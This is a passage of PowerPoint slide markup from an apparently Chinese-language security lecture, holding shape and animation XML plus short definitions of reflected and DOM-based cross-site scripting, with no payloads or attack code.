                <a:lnTo>
                  <a:pt x="7943167" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7965768" y="0"/>
                  <a:pt x="7987443" y="8978"/>
                  <a:pt x="8003425" y="24960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8019406" y="40941"/>
                  <a:pt x="8028384" y="62617"/>
                  <a:pt x="8028384" y="85218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8028384" y="426073"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8028384" y="448674"/>
                  <a:pt x="8019406" y="470349"/>
                  <a:pt x="8003425" y="486331"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7987444" y="502312"/>
                  <a:pt x="7965768" y="511290"/>
                  <a:pt x="7943167" y="511290"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85217" y="511290"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62616" y="511290"/>
                  <a:pt x="40941" y="502312"/>
                  <a:pt x="24959" y="486330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8978" y="470349"/>
                  <a:pt x="0" y="448673"/>
                  <a:pt x="0" y="426072"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="85217"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="93539" tIns="93539" rIns="93539" bIns="9353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1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>非持久性跨站（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>non-persistent XSS or reflected XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57351" name="Freeform 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="4162425"/>
            <a:ext cx="8027987" cy="641350"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 0 h 642734"/>
              <a:gd name="T2" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T3" fmla="*/ 0 h 642734"/>
              <a:gd name="T4" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T5" fmla="*/ 630386 h 642734"/>
              <a:gd name="T6" fmla="*/ 0 w 8028384"/>
              <a:gd name="T7" fmla="*/ 630386 h 642734"/>
              <a:gd name="T8" fmla="*/ 0 w 8028384"/>
              <a:gd name="T9" fmla="*/ 0 h 642734"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8028384"/>
              <a:gd name="T16" fmla="*/ 0 h 642734"/>
              <a:gd name="T17" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T18" fmla="*/ 642734 h 642734"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8028384" h="642734">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8028384" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8028384" y="642734"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="64273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901" tIns="29210" rIns="163576" bIns="2921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当服务端未能正确地过滤客户端发出的数据，并根据用户提交的恶意数据生成页面时，就有可能生成非持久性跨站攻击。</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57352" name="Freeform 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="4803775"/>
            <a:ext cx="8027987" cy="511175"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 85046 h 511290"/>
              <a:gd name="T2" fmla="*/ 24951 w 8028384"/>
              <a:gd name="T3" fmla="*/ 24905 h 511290"/>
              <a:gd name="T4" fmla="*/ 85182 w 8028384"/>
              <a:gd name="T5" fmla="*/ 0 h 511290"/>
              <a:gd name="T6" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T7" fmla="*/ 0 h 511290"/>
              <a:gd name="T8" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T9" fmla="*/ 24906 h 511290"/>
              <a:gd name="T10" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T11" fmla="*/ 85047 h 511290"/>
              <a:gd name="T12" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T13" fmla="*/ 425209 h 511290"/>
              <a:gd name="T14" fmla="*/ 7999860 w 8028384"/>
              <a:gd name="T15" fmla="*/ 485350 h 511290"/>
              <a:gd name="T16" fmla="*/ 7939610 w 8028384"/>
              <a:gd name="T17" fmla="*/ 510255 h 511290"/>
              <a:gd name="T18" fmla="*/ 85181 w 8028384"/>
              <a:gd name="T19" fmla="*/ 510255 h 511290"/>
              <a:gd name="T20" fmla="*/ 24950 w 8028384"/>
              <a:gd name="T21" fmla="*/ 485349 h 511290"/>
              <a:gd name="T22" fmla="*/ 0 w 8028384"/>
              <a:gd name="T23" fmla="*/ 425208 h 511290"/>
              <a:gd name="T24" fmla="*/ 0 w 8028384"/>
              <a:gd name="T25" fmla="*/ 85046 h 5112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28384"/>
              <a:gd name="T40" fmla="*/ 0 h 511290"/>
              <a:gd name="T41" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T42" fmla="*/ 511290 h 5112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28384" h="511290">
                <a:moveTo>
                  <a:pt x="0" y="85217"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="62616"/>
                  <a:pt x="8978" y="40941"/>
                  <a:pt x="24960" y="24959"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="40941" y="8978"/>
                  <a:pt x="62617" y="0"/>
                  <a:pt x="85218" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7943167" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7965768" y="0"/>
                  <a:pt x="7987443" y="8978"/>
                  <a:pt x="8003425" y="24960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8019406" y="40941"/>
                  <a:pt x="8028384" y="62617"/>
                  <a:pt x="8028384" y="85218"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="8028384" y="426073"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8028384" y="448674"/>
                  <a:pt x="8019406" y="470349"/>
                  <a:pt x="8003425" y="486331"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7987444" y="502312"/>
                  <a:pt x="7965768" y="511290"/>
                  <a:pt x="7943167" y="511290"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="85217" y="511290"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62616" y="511290"/>
                  <a:pt x="40941" y="502312"/>
                  <a:pt x="24959" y="486330"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8978" y="470349"/>
                  <a:pt x="0" y="448673"/>
                  <a:pt x="0" y="426072"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="85217"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="2AA1BF"/>
          </a:solidFill>
          <a:ln w="55000" cmpd="thickThin">
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:bevel/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="93539" tIns="93539" rIns="93539" bIns="9353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800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>跨站（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM-based XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57353" name="Freeform 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="827088" y="5314950"/>
            <a:ext cx="8027987" cy="703263"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 8028384"/>
              <a:gd name="T1" fmla="*/ 0 h 702247"/>
              <a:gd name="T2" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T3" fmla="*/ 0 h 702247"/>
              <a:gd name="T4" fmla="*/ 8024790 w 8028384"/>
              <a:gd name="T5" fmla="*/ 711443 h 702247"/>
              <a:gd name="T6" fmla="*/ 0 w 8028384"/>
              <a:gd name="T7" fmla="*/ 711443 h 702247"/>
              <a:gd name="T8" fmla="*/ 0 w 8028384"/>
              <a:gd name="T9" fmla="*/ 0 h 702247"/>
              <a:gd name="T10" fmla="*/ 0 60000 65536"/>
              <a:gd name="T11" fmla="*/ 0 60000 65536"/>
              <a:gd name="T12" fmla="*/ 0 60000 65536"/>
              <a:gd name="T13" fmla="*/ 0 60000 65536"/>
              <a:gd name="T14" fmla="*/ 0 60000 65536"/>
              <a:gd name="T15" fmla="*/ 0 w 8028384"/>
              <a:gd name="T16" fmla="*/ 0 h 702247"/>
              <a:gd name="T17" fmla="*/ 8028384 w 8028384"/>
              <a:gd name="T18" fmla="*/ 702247 h 702247"/>
            </a:gdLst>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="T10">
                <a:pos x="T0" y="T1"/>
              </a:cxn>
              <a:cxn ang="T11">
                <a:pos x="T2" y="T3"/>
              </a:cxn>
              <a:cxn ang="T12">
                <a:pos x="T4" y="T5"/>
              </a:cxn>
              <a:cxn ang="T13">
                <a:pos x="T6" y="T7"/>
              </a:cxn>
              <a:cxn ang="T14">
                <a:pos x="T8" y="T9"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="T15" t="T16" r="T17" b="T18"/>
            <a:pathLst>
              <a:path w="8028384" h="702247">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8028384" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8028384" y="702247"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="70224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901" tIns="29210" rIns="163576" bIns="2921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800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>如果客户端脚本（例如</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>）动态生成 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>的时候，没有严格检查和过滤参数，则可以导致 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="Lucida Sans Unicode" panose="020B0602030504020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                <a:sym typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>跨站攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="18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p:cTn id="7" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="10" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57348"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="11" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57348"/>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57350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57350"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57350"/>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57352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w*0.05"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x-.2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57352"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57352"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="26" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="27" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="57349"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57349"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57349"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57349"/>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57351"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57351"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="57351"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
